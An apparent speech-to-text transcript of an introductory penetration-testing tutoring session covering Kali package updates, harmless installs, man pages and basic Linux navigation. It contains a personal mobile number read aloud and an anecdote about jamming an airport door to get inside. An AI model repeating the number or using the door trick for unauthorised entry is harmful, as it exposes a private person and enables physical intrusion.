...at our own leisure.
Okay, good.
Interesting.
So, Roger, now, this is going to be a data subrecording that's happening that is being stored on reference machines.
We can also include Zoom share.
Yes, it could be Zoom share. Anything that happens directly on his local workstation.
The only correction I'll have to say is the recording is not actually happening... it's not being stored on his machine. It's being stored on our servers.
Okay. So, I don't have to do anything in my Zoom for recordings; that's what I was just looking at.
I don't know, I mean, you can duplicate recordings if you want, I just don't know how much resources it's going to take. I'll let you do it.
So, yeah, let the desktop run the show, I guess.
Run the show with the desktop.
Okay, ready?
So, Rander, you're going to stay here for, I guess, when it's comfortable. I'm going to leave my mobile number with both of you; if you run into any issues, call me.
Okay.
It's 860-478-7278.
Okay.
Good luck for the training again. Any issues, let... there are my test noise brother is not on... All righty then, okay, thank you all. Thank you very much.
So just before you guys start, if you look at the top right in your screen, I just sent the message to our little chat window, so if there's any real, like, issues there, you could always copy and paste or message through there. But I'll have you guys open for a bit, I'll watch for a bit, and then, uh, I'll mute myself, and then if everything looks like it's moving smoothly then I'll end up hitting the call, okay? But you could always message me through there.
Yes sir. Good luck. Thank you.
Good morning, Donna, how are you?
Good morning, Dr. West. A lot of technology going on there.
Yeah, yeah, we got some stuff going on here. What about this week in the world? Holy smokes. Man, this world is crazy, isn't it?
Yeah, the NNSA got hacked on Monday, the Windows server. Crazy, right? Through the back door, the DLL file, SharePoint.
Yeah, there is one government agency that I know of that surprised me. Um, they're getting rid of all of its Windows stuff, thank God. And all right, um, Windows needs to be bulldozed. Windows has some serious issues. So let me put this over here.
And so, you know, Linux got hacked as well, the chroot there, and the VMs have four new CVEs. It's crazy, right? And I wrote a paper, like, how VMs are going to have security, how security layers, layers of defense, are going to apply to VMs.
It's already happened. It doesn't, exactly, because we use Linux to hack into Windows systems, and now if they go from Windows to Linux it's just going to make it easier. It just doesn't matter whatever the world decides to go to. In an organization, the bad guys have a way in if we screw up our defense in depth, our, um, hardening, and we lapse for a day, that's it, because everything is automated today.
Yes, right.
Yes, and you know, on the 19th a new iOS patch came out for Apple with 24 new CVEs. I don't know, you're probably an Android guy.
Yes, me, yeah. I just, I just saved the number. Okay, thank you. Oh, okay, bye. That was managed. Okay, I'm back. My niche, good.
Yeah, so, yeah, anyway, so times are getting, it's getting harder and harder to be a human. So how do we protect ourselves? That's a great question.
And it's a great question. And you don't tell people, hey, I'm protected, because you'll be the new target.
Exactly. They will somehow, someway get in if they're not already in already.
All right, then. So have you done, Donna, have you done any pen testing at all in your life?
I've been in cyber labs where we use Wireshark and we use all the tools, but it is not extensive enough to walk away with any knowledge because you have to move on to the next lab so fast. You can't lose time. So you don't have time to piddle around with each type of software you get introduced to, because in the next lab you're teaching yourself a whole new platform of software. So you just got to keep moving forward. So yes and no, you know. Yes, I have, but not extensively.
Okay. So one of my goals when I teach pen testing is to teach people how to think, so that you can do it on your own immediately, right? And that's a little bit of a process for us, but it's going to be fun.
First thing I do in every pen test course that I teach is I teach, I show this. All right. So we're going to have the orange jumpsuit discussion, because I teach a lot of teenagers, even military and adults, and the boys and the girls, especially the boys, they are big on, I just want to attack and get inside the network. Wait a minute, do you know what penetration testing really is? You know, I'm putting on my CISO hat, I'm putting on my SOC manager hat, I'm even putting on my special agent hat. Um, we don't brag because we got into an organization. When we actually hack into an organization successfully, that is not a good day. Tracking, in my mind, red team is really blue. I've actually had that discussion at, um, Illinois Institute of Technology a few years ago. Red team is really blue. Why? Because we write reports at the end of a penetration test. In order to conduct a penetration test, we must have written permission. We need to understand the scope of the pen test. There are a whole lot of other things we should do too. Let me see.
I want to say I have some of this stuff written out: report writing and post-test actions. Okay. Um, I actually went through the EC-Council's CPENT course, certified penetrat..., that's their top dog penetration testing course. It hit me upside the head. I learned so much.
Can you look at my test? Because I plan on testing for that.
I missed the first part.
I said, do you think it's a worthy certification then? Because I plan on testing through the EC-Council for CEH.
Oh yeah, yeah. Check, uh, CEH. Oh, okay. So look at this. So I'm gonna show and tell, and you're going to do in town. So I think that's a low number, but that's, um... Now when you ask that question, um, whether it's worth it or what the value is of something, that is a relative statement. It really depends on what you consider valuable. Some people think money is of value, and oh my God, yeah, and then there are other people who are like, um, no, it's very valuable to make sure my organization is safe, that these people are safe. So, um, this is probably not accurate, because where I live in Virginia I would argue that that could probably be twice as much. And just to show you an example, the GWAPT certification through SANS usually pays double; I've seen double this amount. It's pro... I haven't looked here in a long time, but there was a link that literally showed it paid about 205,000 a year. Depends on your experience, depends on who you know, etc., etc. With that said, there are a lot of, um, pen test certifications. Let me try to break it down and categorize them in two categories for you.
Yeah, I know these. Okay, I know where you're going. I get it.
So we have theory tests where you have to memorize and hopefully get the answer correct. And then we have the practical side.
All the CompTIA tests are the memorizing, and then all the practical is why I'm here.
Correct. So what we're going to do, as a matter of fact, let's work and talk simultaneously.
Can you please open up your terminal? You have things to do in front of me that go along with what we just need to do if we were doing the job. And we can talk at the same time, because some things will require you maybe to install stuff. And I want to show you how as well. And I'm also going off of a little cheat sheet here. I'm going to give you, I'm going to do my best to give you exactly what you ask for.
So how do I get into my screen?
Oh, the desktop. Because I see your screen now. I see your face and your screen.
I can't get into mine, seems like.
So you're going to have to work on your computer. Do you have two screens or one?
I have one.
Oh, oh, okay. So that's the thing. Minimize, uh, pull up your one screen, and then, um, did you see the desktop yet?
I see, yeah, I see the desktop, but I don't have... it's under your control. I can't get it. How do I get it?
No, no, no, no. Um, minimize this screen and pull up the desktop.
Okay, there we go.
Okay, now, yes, now open up a terminal. Uh, you can either right click and click Open Terminal, or you can click on the little black box next to Firefox up there, right there. Yay. Now I just can't see it. I'm gonna go big. All right, I'm here. Okay, so you won't be able to see the Zoom screen; you can see your personal screen.
Yeah, I can hear you. That's okay.
Okay. If we had... that's what I was going through earlier. So I have two, I have three, three screens. One where I see you, one where I can see the desktop, and I have another one where I can see my desktop as well. So what I would like for you to do is make this screen larger, right? The terminal. So I want you to press Ctrl+Shift and plus, plus, plus. Make sure you're inside the terminal, otherwise it won't work.
Yeah, I'm up to 150%. You want bigger?
Oh, I didn't see any change on my end. Did it not change at all?
I did Ctrl...
Now Ctrl+Shift, plus, plus, plus. Hey, there you go. Beautiful. Yay. Good. Now, do you know how to update your terminal?
I believe I did that, um, but let's, uh, let's go through it.
Okay, so check this out. In this world, when or if you don't know anything, the foundation for success is research. Most of the actual hackers that I know that have actually been arrested, and I just know real live hackers, they never sat in any class, they didn't pick up a book, they just started googling and trying stuff. I learned a lot about that. So you're going to type, um, sudo. Do you know what sudo means?
Yes.
Okay, can you tell me at least two definitions or acronyms?
Um, it is just, um, an administration file to get to, to wake up the terminal.
Okay, so what does s-u-d-o mean?
It is a root command.
Not that, like the literal letters, what does sudo mean?
Question.
Ah, okay. So go ahead and type sudo, we're going to find out in a minute, space apt space update, press enter. Yay. So what we're doing is we're updating all of the different packages and programs within the terminal. So if we're going to do an actual live pen test, we definitely need to make sure we have the latest packages. So this is a mandatory thing that every pen tester needs to do, every security administrator needs to do. So this is something, um, uh, that you want to write down someplace in your notes. What are you using to take notes?
I have a notebook right here.
How about digital notes?
Um, I memorize it usually.
Okay, I'm going to show you something. Okay. All right, by the way, hit the up arrow one time, backspace and erase "date". The backspace button, erase the word "date". Type in the word "grade", g-r-a-d-e, space, tack y or dash y, dash y, press enter. There you go. After you do an update, you must do an upgrade; they come together as a package. Okay, so I know your handwritten notes are going to be fantastic, but the reason why I want to show you how to take digital notes is because as a pen tester it's much faster. Manual pen testing is something that a lot of pen testers really don't do unless they absolutely have to; they're going to, um, do automated pen tests. We're going to learn manual pen tests, because that's the foundation before you get to all those fancy tools that are out there. Um, there are organizations out there that will sell you these tools, and they're upwards of twenty-five thousand dollars or more. And then what the dark side community or the really good pen testers do is they make their own tools. They go to Python, they start making a whole bunch of different tools, and they just go off and they just save the world. And look at this, this upgrade takes a while. So it's a good idea, that is really good, that we're showing this. When this finishes, I'm going to show you something. Feel free to either type the question or ask questions so that you have full understanding for anything. Okay?
Yes, sir.
Fantastic. All right. So when we open up, you're going to do a brand new pen test, and we're actually about to do some actual work. Remember sudo apt update. So I'm going to kind of help you out a little bit. I'm going to google... can you see it? No? You don't see my screen anymore. Okay, because you're on your terminal. Let me see mine. Okay, so then let's do this then. Oh good, click on the Firefox icon. Yeah, you got ambitious. You got a lot of them. Click either. Yeah. Yeah. Yeah. Go ahead and close one of them, the blue X in the top right.
Oh, but it's like... oh, there we go.
There you go. Now go inside the browser of that Firefox. Just click in the browser. Don't worry about anything else. There you go. And you're gonna type a simple question: what does sudo mean in Linux? You put it in chat, it's fine too. And, uh, what does sudo mean in Linux? Okay, now I'm gonna let you...
Superuser do. I should have known that. Or substitute user do.
Yes. So it's just something that you should know as a, uh, cybersecurity professional doing pen testing, right? So we're adding bullets to the things that you'll learn. Now I need you to type in: what does apt mean in Linux? So now I would like for you to read the command to me with the translation that you just learned. sudo apt, um, update, what does that mean?
So it is, uh, superuser do for advanced tool package, uh, updating the software packages that are already on Kali.
Right, so the literal translation is superuser do, advanced package tool, update. And yes, you just finished it off with the end. Fantastic. And then of course the upgrade. Uh, the reason why we put the dash y on it is because we're telling the program yes in advance, because when we do the upgrade it'll ask, do you want to continue with this installation? You have a choice, yes or no. Okay, so that's basic scripting, right? Um, so now I want to go back to the terminal. Click on a terminal right behind it. Let me know when you're there. Hit the up arrow. Press, press Ctrl+A. What happened when you did that?
It's the upgrade feature.
No. Press, press Ctrl+E now, and watch, watch the cursor. Now press Ctrl+A again. Move the cursor back and forth, right? So A brings it to the beginning, E brings it to the end. Now I want you to use the arrow and put it on top of the A for apt. One, two, three, four, five. Arrow. It's not loading the cursor. The arrow, the arrow. There you go, got it. Type in the word "full", f-u-l-l. No, I'm sorry, backspace that. Put the "full" on top of the U for upgrade. Use the arrow key; the mouse won't work, so you got to use the arrow key because you're in Linux. Now put a dash. full-upgrade, no space.
Oh.
Right, but no space. No space. So take the... um, put the cursor... is that... I can't see, like, uh...
I can't... hang on, now I lost it.
Oh, you can't see, like, your terminal. So this is what we'll do. I'll stop sharing, you share your terminal, and I'll work from here. Stop share. You go ahead and share. Go. Actually, I don't think that's gonna work either, because you still need to be typing on your desktop, right?
My desktop. So this... okay, so where's... hi, hi again. Share. Where's my screen? Um, hold on. Um, let me share... God, let me share my screen again. I think I see what's going on here. Screen three, share. Okay, um, I'm thinking... okay, so there I was, but it disappeared. And, um, I'm gonna hit share. No, but I already did.
All right, so do you see me? Do you see my screen that I was...
Now, now, now I see your screen.
Let's work it like that, and I'm gonna move mine over here so I can see both screens. You're gonna do all the work, okay? Yeah. Now, good, now take the space out of "full" or after. You just had a little bit.
Mm-hmm.
Uh, Dana, your, um, your browser window's very zoomed in. If you hold Control and use your mouse wheel to scroll down...
Okay. So can you guide me to where my screen went?
Oh, you went back pretty... It's probably the desktop, right? Yeah, go to the desktop login. I think you can go back to the middle tab of your browser window. So this is the Zoom call. Go to the one that says the desktop participant join. You can close that. Don't close the Zoom window.
I've got two of them up. All right, so...
Okay, so if you could just... the one that says desktop login here, if you look at the top of your browser tab.
Yes.
So the top that says desktop login here, at the very, very top of the browser window. Or you could hit... here, okay, so... Oh, so the tab itself. So you're currently in this tab; I want you to go to the third tab.
Yeah, it's just cute.
So your mouse is... are you having issues with your mouse right now?
Yeah, it is just acting bizarre, so I don't know.
You can do Control-3.
Okay, so you see it?
Yeah, if you could log... I guess you could log back in, or you could hit forward. It looks like you went back a few times. But yeah, you log back in, yeah.
The course itself, it says organization course thing, yeah, right here.
So now I'm closing up the space.
There you go. Hit the backspace again. Hit backspace twice. Now put a dash. Now put a dash. Uh, now press, uh, enter. I'm just gonna keep this screen here and not mess around with it. Okay, I'm ready. All right, now, um, there are various types of, uh... thanks, Roger. There are various types of, um, commands. You're going to need to find a list of update and upgrade commands for Kali Linux. Can you go to, um, Firefox, right there in your tab, and let's find that.
Can I look at... can I use ChatGPT?
Um, yes, you can. Um, when it comes to research, if you're in an environment, let's say you work in a SOC and you're a pen tester there, they may not have ChatGPT. So I want you to, when you do research, google it, click on images, videos, and, um, of course AI software are excellent resources, and there's more that you can add for that. So go ahead. Can you... yes, you can. You can research it any way you can, but I'm going to show you why you want to do it the way I do in a minute, as soon as you find that. All right.
So what are upgrade commands for Linux, is what you wanted me to ask? I'm asking Google Kali Linux...
Just type in Kali, Kali Linux update and upgrade commands list, or commands. You want the list.
You want the list?
I want the list, yeah.
Well, I have the brain all over the place. I just... okay, I have it.
Okay, fantastic. Okay, how many do you see?
A lot.
Yeah, well, yeah. So these are things that you are expected to know if you're going to be pen testing in the real world, and I just wanted to show you, uh, I wanted to show you what they are. Um, if you don't mind, can you copy the list, if it's small enough, and put it inside the chat so I can see your list? I'm a little bit disadvantaged because I can't see the screen the way I normally could.
Dr. Weston, you can also open up OneNote in, uh, your desktop here.
So yes, I know, yeah, display, yeah. Okay. I, um, I actually want to get her to do it. I have a reason.
Okay, no worries.
Okay, well, thanks. I'm gonna close this. Um, Donna, did you put, um... do you know where the chat is, or you don't know?
The same list I have is broken up, um, like a bunch of different commands. So I'm gonna use that and go to Firefox.
Is there a URL that you can put in there? Um, it's a lot quicker that way. I can just click on it.
No, I don't.
Okay, here we go. I'm going to show you something. Okay, yeah, I'm gonna, um... okay, let's come over here.
That's what I hate. Google never gives you a list of anything. It's just a convoluted nightmare. So I don't have a list, I have a bunch of commands. Um, this is in GPT, right? Oh my God, I got it. All right, okay, let's see. I got a copy.
Best way to do this is here. Oh, I can't type. Okay, let's do it this way. It's just that I can't see the screen; mine's a little bit tiny too. All right, so maximize your screen again, if you remember that X that I told you to click. But then I keep... and you can always escape out of here to go back. Okay, like, you want this one? How's that?
Oh, that's fantastic. Oh, that looks like the whole directory. Um, um, then updates command line guide. I'll just Google that. It's a big man, that's with Linux blog, and then I'll get this. I have the URL now.
Oh yeah, that's... I mean, that's, you know, a bunch of different packages that are actually updated on that particular update. But underneath it, you know, we are... OK. OK, so depending on the flavor of Linux that you're using, by the way, Kali Linux is a Debian, D-E-B-I-A-N, flavor. They use the APT, or advanced package tool, command. So that's why we type in sudo apt update, or upgrade, or full-upgrade, etc. Okay? But if you're actually using a tool such as, uh, Debian or Ubuntu, use the same. But if you're using something like Red Hat or Fedora, then they're going to use the dnf command to replace apt. We cool?
Yep, I'm with you.
And if we're using BlackArch Linux or Arch Linux, we'll replace APT or DNF with pacman. So it behooves us to understand and know the flavor of Linux that we're using, so that we can actually apply the appropriate package tool upgrade feature.
Yes, sir.
Okay, good, good, good, good. Okay, so now, do you know how to find your IP address?
Not exactly.
Okay, just type in the word... So, okay, hold on. Let me show you this real quick. I've got to show you this. How do I show you this? Because I need to... I can't show you on this screen because it's too small. So I'm going to need you to just find the stop share button. Stop sharing. I'm going to share my screen real quick, and it will come back. Fantastic. So, I'm going to share my screen. Hit the share button. Share screen three. Share. Okay. Can you see my screen?
Yes, sir.
All right. I'm going to come back over here and I'm going to type pen test. Today, we're going to do several pen tests, and we're going to be a little bit aggressive with it because I want to make sure we can get in all the boxes. But I want to answer all your questions. What I want you to do is to look at, say, some of the previous pen tests that I've done in my life. Um, this is actually InfoSec Prep, which is OSCP certification, and look at how I took my notes. It's a little tiny on purpose, but I can make it bigger. So I documented the project or the task, the objective. Um, I documented the actions or the screenshots, the commands, the basic information and definitions, and what I learned.
Because remember, we are actually testing someone's security defenses, hence penetration tests. In other words, back in the day, I used to do pen tests, physical pen tests of the airport. This is before 9/11. And I'm looking around to study how these people would leave the door, and it would close really slow, and then I would walk over there real quick and I would drop something and leave it, like a little hard item, and then I walked back over and pushed it with my foot, and when someone left and they closed the door, it wouldn't close all the way. And then I walked over and said, oh man, what's this? And I picked it up and walked inside, and I got in the airport. Very successful, right? Um, it's crazy, right? That is, um, an example of how we get in. We sit on the side and we look at, um, we look for vulnerabilities, right? When I'm sitting on the side, I'm information gathering. So I'm sure... are you familiar with the penetration testing steps?
Well, recon being the first one, like you're saying.
Right? So reconnaissance, information gathering, they kind of fall in the same boat. There's passive information gathering and then active information gathering. You know, passive, I was just sitting on the side, hanging out and taking notes, right? Active is when I'm starting to actually touch and feel. You know, maybe I'm looking for, hey, this door is unlocked, you know, that type of thing. And if I walked in and someone saw me: hey man, this door was unlocked, I was just trying to let somebody know. But I was really trying to get in. So if I got busted I had to come up with a tagline to get out of the situation. Okay, um, so yes, um, I need to show you how to take these notes like this. Today, we're going to do it the hands-on way. Then tomorrow, we'll start to use different tools to take notes for us. You need to understand the basics from the beginning.
These are a variety of different pen tests. And I can show you how to do this in your OneNote. Or I can even show you myself. And I'll add a page real quick. And I'll just put, um, Donna pen test. Let me show you how to use one, though. Okay, and I'm just gonna say, uh, project name, tab it over, commands, tab. I'm saying these words on purpose, right? Um, screenshots, tab, analysis, tab, lessons learned. Then I'm going to press enter to give me a new line, and let's say today we're going to do basic pen testing, tab, and then I'll come over to lessons learned, press enter, and then I'll put in, um, let me see, um, information gathering or reconnaissance. You can spell that right and fix that. Even before I do that, I'm gonna... I'm doing this on purpose. I'm gonna go to table and I'm gonna add a row below, so if I missed something I can just put it in here. Let me see, um, rigid for written permission, and maybe I'll add another line below and say, uh, scope of work. I can go on and on, right? As I continue here, then I can talk about, um, enumeration, uh, maybe, uh, exploit, uh, oh, enter exploitation, um, whatever our phases are. So let me see, phase, pen test, pen test, let me go to Google, because I don't know where I have it. Move this here, up there. Pen test, uh, I don't know if it's phases or... I don't know why I asked the word for the day. So here we go: reconnaissance, scanning, vulnerability analysis, exploitation, post-exploitation, and reporting. Depending on the certification you're learning, the names or the phases will be slightly different. CEH is different from PenTest+, both of them are different from CPENT, they may be slightly different from OSCP. Do you understand?
Yes.
Fantastic. I just want to make sure you... why is that over there? I just want to make sure you understand that there are some differences. We adapt and overcome no matter what they are.
We do.
So now we have that.
I'll come back to my OneNote really quickly. Commands. Let's just say, let me add a new line. Table, insert below. Right? Let me see. Update and upgrade commands. This is just an example, not exactly like it belongs here, but I'm going to type sudo apt update. You can even combine the commands: two ampersands, sudo apt upgrade, tack y. Right, stress this out if I need to. I come here, and I'm actually on my terminal on my computer now on purpose, because I want to make sure it's big enough so you can see it. So if I type my command, apt update, Ctrl+E, press enter, it goes through its process, and now, okay, I see what I need to see. I go back to my OneNote, screenshots, go to insert, screen clipping, highlight what I need, let it go. This is the old-school manual pen testing, right? Analysis: I upgraded the machine. I updated and upgraded, I'll say, Linux to ensure all packages are ready for the pen test. See how that works?
Yep.
Fantastic. I'm hoping that this is helpful for you, because when I teach my students, um, do you see how many pen tests I have here? And actually it's not a lot there. I have a lot of tests here where I make them take notes from the beginning, because everyone wants to pen test but no one wants to take notes. So let's just...
I like, I like how yours is in block format, the old school, because we just got out of operating systems where we had to APA report our screenshots, and it's a drag.
Because this is the real way to do it, right? So check this out. Let's just say, I'm going to type Splunk. This is when I installed Splunk SOAR. I have screenshots galore, everything that I do. Sometimes I've installed Splunk Enterprise. Any and everything that I do, let me see. Go off to the SOC, take screenshots of the work, have the answers. As a SOC manager, you must take digital notes while doing the work, period. It's for your report.
Because of the timestamp, yes.
All kinds of reasons. In OneNote, I taught within the Alabama Cybersecurity Fellowship. I'm able to share this with the team so I can keep up. I gave them all their tasks. I'll put an example. These are all the people that are here. I have a whole bunch of different tasks here. Look at the screenshots of all the work they've done. Why did I do this? Because when I was the SOC manager and the CISO in the government, we had OneNote. That's one. Two is, OneNote, I had the ability to sync books and share them with my team. When I was off site and needed an update, I could pick up my government phone or my laptop and I can actually scroll in and see who did what work. Because the goal for me when I teach students is to turn schoolwork into work. When we get out of the... everyone wants to be shown how to do it. I want my students to show me how to do it. I'll sit here like this and say, what are you thinking? This is what I'm thinking. And then you're going to research it and you're going to do it. I have a whole formal process that has nothing to do with, no prob, outside of here. But what I need you to do is to actually do that here on your OneNote. So I would actually... I think what I'm going to do right now is not share my screen, and I want you to make your screen full. Let me see if I can do that. How do I do that?
So at the bottom right of her, uh, team, you can hit the X, or you can pop it out.
Of her pane or my pane? I want to not share my screen.
Yeah, you can just... see her screen, is that what you want, to share her screen? Okay, all right, I got you. So I'll make her screen, uh, oh, bigger. Can you pop it up? You can make that... you can maximize your screen now.
Okay, well, can she see her screen big like this?
She could do that too. Um, Donna, are you able to maximize your screen via the X at the bottom of your pane?
No, because it's, like, it's on his screen now. So maybe I can... oh yeah, okay. So yeah, it's on Dr. Wess's. So I need it to flip back to mine, and then I can hit the X.
Yeah, how about now? I mean, I'm still seeing yours, but, um, I just clicked on the word interactive. There we go. Now something's happening.
I did something, because what I'm seeing is just the Zoom link.
Same. So I see... yeah, okay, so you just see the Zoom link. I don't know. So you gotta just minimize, minimize Zoom and go back to the desktop.
Yeah, yeah, and then I can shrink it with Control. How do I shrink, how do I shrink the size, the size of the browser or the journal? Okay, that's all right. I'll use it like this. All right. I'm ready. Thank you.
Can you just click on... if you click on full screen, will that take over my screen?
So that's what I'm hoping it would do. I have a full screen right now.
You do? Okay, that's fine. I got it now. Long as she has a full screen, I'm good. Okay, let's get into this pen test, right?
--> Um, one of the things that --> uh using update update updating kali linux so you kind of have that cheat sheet you know how to do --> that and you've also a chat gpt-ing it i want to make sure you understand that can you yes i --> understand can you show or tell me how to install kali linux from scratch if you have to do this in --> the real world well yeah i would i would uh create a new vm and put um kali in it okay it's not --> really i mean so you know how to do that yes sir okay um i have written instructions on how to do --> that with my screenshots that's why i asked but you can google them anyway so we we are covering --> the introduction portion um i i have cali already on a virtual machine and i have parrot already on --> a virtual machine fantastic um okay um by the way in the in the if you want to sit for a ceh exam --> or any ec council exam they require you to use parrot security versus um cali lennox that was --> a new change a few years ago so it's a really good idea to learn how to do installations --> you know um like um on this machine right here can you install steam locomotive real quick --> do you know how to do that um no because no this is good i mean i know that you type it in and hit --> yes but i don't know like how you we're going to get you to know it that's fantastic let's do it --> click on our firefox real quick and i want you to type that question how to install steam locomotive --> on cali linux just so you know this is all pin testing even these installations to install steam --> locomotive calendar which is a debian ppt scroll down show more okay do you see that command right --> there sudo apt install sl yes sir go ahead and type that in case sensitive so make sure it's not --> capitalized i see that sudo now i lost my firefox case um go ahead get it yeah i don't i don't have --> I lost my firebox oh sure apt space install space SL got it enter okay something is happening it --> looks like it's actually working okay now type 
SL in period let me enter SL enter yes there you go --> you just install steam locomotor um not terribly difficult to do is it you just need to know how --> you can also uninstall it or remove it by just replacing install with remove so these are --> basic things that you're going to know you may find yourself in a situation you're doing a pen --> test and you have to install something you need to know how to do that right yes i do it's just that --> we can we keep switching back between linux commands like i go to fedora i have one then --> i go to ubuntu i have another then i go back to cali i have another so i don't have them --> committed to memory so i always pull up the list good the cheat sheet yeah don't worry about --> committing it to memory the muscle memory will come the foundation the the basement of a house --> right is to research it period yeah right in in time oh yeah you're going to memorize it you're --> going to spit it out just like i'm doing it um what i try not to do um the my methodology of teaching --> is you do the work you're going to teach me and uh i'm going to learn from what you do and teach --> then i'm going to do the same thing so um now i want you to install rig well go ahead and do it --> rig rig and looks like you do the command how do you run rig how do i run a rig no how do you run --> what you just installed yes no look at what's happening what did you do with the steam locomotive --> that's the steam locomotive now i want you to run rig i gotta type in rig there you go i got it --> yes sir fantastic okay now i want you to show i'm going to show you another way to install a command --> okay type in tl dr it may not work press enter okay see it and that's why see what it says teal --> deer just type in the word teal deer not the apt stuff oh keep it together type what you see --> remember the words are together backspace third line till till deer press enter oh it didn't work --> yeah okay type in type in um pac-man 
p-a-c-m-a-n press enter oh see that that's what i was trying --> show you is asking you a question say yes yes say yes read it make sure you read it yes okay --> the lesson here is to make sure we always read the outputs so as pen testers we need to read the --> inputs and read the outputs now type pac-man press enter oh it failed could not create the database --> probably because we're on this particular lesson here but that's okay so now hit the up arrow twice --> press ctrl a type sudo base apt space install space enter you'll be coming a master at installing --> stuff now i want you to go ahead type q deer see what does all right now type tldr press enter --> okay that is the command right there that's the shortcut so now hit the up arrow one time space --> and type um sl enter okay see the error message um run tldr space tac tac --> update to download the cache. So go ahead and type that. Hopefully this works. Okay. Now hit --> the up arrow twice. Press enter. Yes. Yes. Have you ever heard of TLDR or TLDR, which means too --> long, don't read? Oh, TLDR means too long, don't read. 
So when you're typing an email to somebody, --> you expect them to read a book or do you expect them to read a little caption --> and book I like it okay so now the reason why the TLDR is there is because I want --> you to type man space SL and press enter enter now that's the manual man is short --> for manual you don't understand a normal command you can type this and then you --> hit the down arrow keep going down until until it gets to the end is that the end yes sir okay good --> now go all the way back up hit the up arrow right so this is actually a short one but the sl was --> created because sometimes we want to type ls for list and sl sometimes we we kind of invert it um --> and it'll show the manual will show you any command all right they give you a --> synopsis of how to use it press q let me give you a longer one type man man space --> uh something longer um uh dir press directory yes okay see how much content is there --> hit the down arrow that's a lot right that is a lot okay press q okay let's i hope it's short --> type tldr space dir enter there you go it's a shortened synopsis of the same thing from --> from the the help or the manual have you ever used these before yes good in lab yeah okay so there's --> a reason why we want to use these things, right? Of course, you know how to use DIR space tag tag --> help or even DIR space tag H. The key here is I'm just trying to show you some things you may --> have to do as a pen tester. You may not understand something, you can do it. 
Have you --> ever used april probe before not sure type in um a apr pos a p a p r o p o s press enter --> okay now hit the up arrow space um type in like dir press enter --> whoo look at all those directories right it's crazy right now in order to truly learn this --> you'll have to go to firefox right up there at the top and open up a new tab --> plus on the top like top top left plus sign right there --> okay type in april pro a-p-r-o-p-o-s space geeks for geeks oh i love geeks for geeks i do too --> press enter see what it says april command in linux with examples --> yeah click on that we pin testers sometimes need examples right before chat gpt was google right --> and yeah so if you went through this entire thing you can teach yourself everything about april po --> and be like let me continue my pen test all right i'm trying to show you some things that you may --> actually need during the pen testing you understand got it okay so there's more than --> just google we don't just google stuff we also don't just chat gpt stuff we use everything --> scroll to the top again scroll to the top no no don't take that away just scroll to the top of the --> page oh good now click the back button just one time now i want you to click on images --> tons of articles that will teach you everything you need to go to quickly learn april pro and --> continue with your pen text click on videos right i don't see a whole bunch of articles on that but --> sometimes they are then you have on the more and it has a drop down click on the drop down on the --> far right next to more that's tools go to more next to news this to the left the word more --> thing is there's something blocking right here and you still have to go left go left --> you have go back to videos all of this is research stuff that we have to use --> versus ignore you understand yes there you go that's all I want to show you so --> that we can make sure that when we now the really cool thing is if you had your --> 
one note open you can copy those videos and place them there and keep them for life --> so now i want you to go to youtube real quick and hopefully what i want to show you is there --> click on youtube.com and in the search bar i want you to type marie m-a-r-i-e --> space forleo f-o-r-l-e-o f-o-r-l-e-o l-e-o o-r-l-e-o space psa press enter right now that 52 second video --> i need you to click on it and actually listen to it watch it and listen to it wow i want you --> to sign in to confirm you're not a bot i just hate it okay hold on i don't know why uh because --> you're in your cali um worst cases i can show you over here okay to watch it somewhere else --> um that's fine go ahead then okay i'll watch it on uh just open up a new tab --> got it on your host machine and then you can come back to it all right got it okay --> you want me to watch it right now watch it this seconds because only 52 seconds --> i can't see it but go ahead and watch it what questions do you have from that simple sarcastic --> relatively funny video none okay i i look up everything that's i mean i spend my whole life --> looking stuff up all day long so i concur i get it fantastic so if you're ever so the way pen tests --> happen in the government is something in a whole bunch but in the government my pen tester worked --> alone but on occasion he worked with a team they um they obtained written permission --> They understood the scope. We had a get out of jail free person just in case we saw something --> we weren't supposed to see. We reported it immediately. We conducted all of our vulnerability --> scans. We followed the whole process from the very beginning. 
When I meet you, I'm taking notes --> because i'm writing a report i am writing a report off of actual things that's done not memory --> our great memories lack when it comes to documenting exactly what happened step by step --> okay why because we want to get paid as pen testers right especially if you're a contracting --> company we need to document everything just in case for some reason they say the government says --> well why didn't you document everything is and why didn't you show us this and why didn't you --> show us that when you think that's important and then they'll twist it and make you feel like you're --> a criminal and they may even be interested in prosecuting you definitely not paying you and --> then they go well you know you're really not what we wanted so that's why we take notes from the --> beginning because in the end we don't want to have to go back i teach my analyst that from the very --> beginning we also need to know our commands right type the um type the word history in your um --> and you've typed this command before i presume yes fantastic so that'll show you all the commands --> that were typed into this in this shell when you were here now what we need to do my original --> question is can you tell me what your ip address is on this machine oh i can find it yeah of course --> do you know the command no okay no i what without not looking it up no fantastic so type in find it --> i i believe you i know you will i'm not worried because we've done some exercises --> by the way um i'm sorry type in um man space rig i wanted to show you what that was --> have you ever heard of the random identity generator no but now you have i was just --> it's a random identity generator okay go ahead and press q and type in man space sl press it --> it displays animations aimed to correct users who actively enter sl instead of lx --> i want you to get into uh custom to manning or reviewing the manual for all commands okay press q --> um okay um you 
familiar with pwd press are you familiar with this or is this the first time --> password no good guess though um it's actually i want you to man it it was right at the top --> don't skip what was at the top now that's where it tells you what it is print name of current --> working directory i got it shows you where you are go ahead and cue it okay um right now do you see --> that tilde at the end that little tilde in the little brackets yes okay it's showing you that --> That's usually the top of the directory, but your home directory is you're in slash home slash student. --> Do you know how to maneuver in Linux? --> I don't think you do because of what you said, but I'm asking. --> Probably not. --> Okay, this is going to be. --> I mean, let's do it. --> Let's do a little crash course. --> It's going to be fun. --> Okay. --> Now you are in home. --> You're in the student. --> uh type in who am i all one word oh should have known that and this is what we pentesters do --> right and who are you which is the before that little at insignia or that little asterisk in --> the middle you're a student that's the student the host name i'm not the host name that's the user --> of this particular linux terminal if you type in a name host name what's going to come up you have --> any idea? Can I type it? Go ahead. Press enter. Uh-oh. Type it all as one word. Cali. That's the --> password. Well, no. That's the system. The system name. So you have student at Cali. So when you type --> who am I, it's going to tell you the user that you're using. Something you need to know when --> you're doing pen testing. 
